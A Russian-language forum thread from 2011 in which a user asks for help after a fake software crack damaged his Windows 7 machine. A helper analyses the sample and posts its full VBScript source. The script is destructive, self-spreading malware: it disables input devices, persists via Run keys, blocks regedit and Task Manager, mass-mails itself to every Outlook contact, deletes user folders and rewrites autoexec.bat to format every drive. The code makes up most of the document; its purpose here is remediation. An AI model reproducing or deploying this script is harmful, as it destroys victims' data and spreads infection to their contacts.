Очень плохой вирус
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Очень плохой вирус - 2011-06-04 22:01:14.096666
|
|
|
krow7
Сообщений: 46
Оценки: 0
Присоединился: 2011-05-09 23:17:18.466666
|
Всем привет. Решил скачать прогу, было написано, что нужно крякнуть. Ну я и повелся как ламер и запустил кряк. Сразу же выскочил месседж бокс: в заголовке написано "Ламер" и внутри что-то обидное еще. Половина ярлыков и вообще файлов на рабочем столе исчезло. В моем компьютере вообще ничего не отображается. Пытаешься обратиться к любым файлам через путь - пишет "Операция отменена вследствие действующих для компьютера ограничений и т.д." Обменялись местами значения кнопок мыши, но это я исправил в свойствах мыши. В автозагрузке висели rundll mouse,disable и keyboard disable и еще две вещи в таком же стиле, я их выключил. Блочил еще диспетчер задач и редактор реестра - их я разблокал через групповую политику. Пока больше сюрпризов не нашел. Ось семерка. Подскажите пожалуйста, как ЭТО лечить и можно ли вернуть все ярлычки и файлы рабочего стола? Спасибо.
|
|
|
RE: Очень плохой вирус - 2011-06-04 22:07:43.160000
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
выложи файл, проще будет сказать о всех сюрпризах. обычная игрушка школьников использующих стандартные фишки винды. ярлыки думаю никак не вернуть. Что конкретно произошло без файла можно вечность гадать.
|
|
|
RE: Очень плохой вирус - 2011-06-05 09:40:01.206666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Такс. Вирус как и предполагалось скриптовый. название программы я уж не помню. Вот функционал.
= = = = = = = > КОД ВИРУСА < = = = = = = =
'
Объявление переменных(этот абзац не перемещать)
Set FileSystemObject = CreateObject("sсriрting.filesystemobject")
Set Shell = CreateObject("Wsсriрt.Shell")
t = 0: On Error Resume Next ' Пропускать ошибки
Set Application = CreateObject("Shell.Application")
Set InternerExplorer = Wsсriрt.CreateObject("InternetExplorer.Application")
Set Outlook = Wsсriрt.CreateObject("Outlook.Application")
' Поменять функции клавиш мышки местами
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton".
.Shell.Run "rundll32 user32, SwapMouseButton"
' Вырубить клавиатуру(Только для Windows 95,98,Me)
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
Shell.Run "rundll32.exe keyboard.exe, disable"
' Отключить мышь(Только для Windows 95,98,Me)
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
Shell.Run "rundll32.exe mouse.exe, disable"
' Минимизировать все окна
Application.MinimizeAll
' Запускаться при каждой перезагрузке
Set File2 = FileSystemObject.GetFile(Wsсriрt.sсriрtFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
' Блокировать
RegEdit(чтоб у него не заводился редактор реестра).Для того чтобы разблокировать происвойте DisableRegistryTools значение - 0
Shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD
"
' Удаление пунктов меню Пуск: Программы, Завершение работы, Найти, Выполнить, Документы и т.д
.Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоr
er\NoStartMenuMorePrograms", 1, "REG_DWORD"Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoClose", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoFind", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoRun", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoRecentDocsMenu", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoFavoritesMenu", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoStartMenuLogoff", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoClose", 1, "REG_DWORD"
' Перейти на сайт "http:\\"InternerExplorer.Visible = True InternerExplorer.Navigate "http:\\"
' Разослать вирус Все контакты неприятеля
For Index = 1 To Outlook.GetNameSpace("MAPI").AddressLists(1).count
Set OutMail = Outlook.CreateItem(0)
OutMail.to = Outlook.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Новое_Название"
OutMail.bоdу = "Новое_Название"
OutMail.Attachments.Add Wsсriрt.sсriрtFullName
OutMail.Send
Next
' Удаление всех специальных папок
For Each Folder In Shell.SpecialFolders
FileSystemObject.deletefolder folder,True
Next
' Удаление Documentsand Settings
FileSystemObject.deletefolder"C:\Documents and Settings",True
FileSystemObject.deletefolder"D:\Documents and Settings",True
FileSystemObject.deletefolder"E:\Documents and Settings",True
' Вывести сообщение Shell.popup "вирус заражон! :)", , "Ламер", 0+16
' Форматировать Все диски (Только для Windows 95,98,Me)
If FileSystemObject.FileExists("d:\autoexec.bat") Then Str = "d:\autoexec.bat"
If FileSystemObject.FileExists("d:\Windows.000\autoexec.bat") Then Str = "d:\Windo
ws.000\autoexec.bat"If FileSystemObject.FileExists("d:\Windows\autoexec.bat") Then Str = "d:\Windows\autoexec.bat"
If FileSystemObject.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If FileSystemObject.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If FileSystemObject.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = FileSystemObject.GetFile(Str)
ab.Attrib
utes = 0
Set autoexec = FileSystemObject.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@formatf: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
Shell.Run Str, 5
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", 67108863, "REG_DWORD
"
' Перезагрузить компьютер(Только для Windows 95,98,Me).
.Shell.Run "Rundll32.exe User.exe,ExitWindows"
' Самоликвидироваться
FileSystemObject.deletefile Wsсriрt.sсriрtFullName,
|
|
|
RE: Очень плохой вирус - 2011-06-05 11:01:48.346666
|
|
|
krow7
Сообщений: 46
Оценки: 0
Присоединился: 2011-05-09 23:17:18.466666
|
огромное спасибо, Ltonid. По-моему, устранил все, что он наделал. p.s. вот бы для каждого вируса такой списочек шел ;)
|
|
|
|
|